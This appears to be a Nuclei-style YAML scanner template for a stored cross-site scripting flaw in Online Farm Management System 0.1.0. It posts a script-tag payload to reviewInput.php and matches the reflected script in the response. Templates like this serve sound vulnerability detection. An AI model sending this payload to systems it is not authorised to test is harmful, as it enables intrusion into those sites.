id: onlinefarm-management-xss

info:
  name: Online Farm Management System 0.1.0 - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.
  reference:
    - https://www.exploit-db.com/exploits/48673
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
  tags: onlinefarm,cms,xss,edb

requests:
  - raw:
      - |
        POST /reviewInput.php?pid=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0

    host-redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<em style="color: black;"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
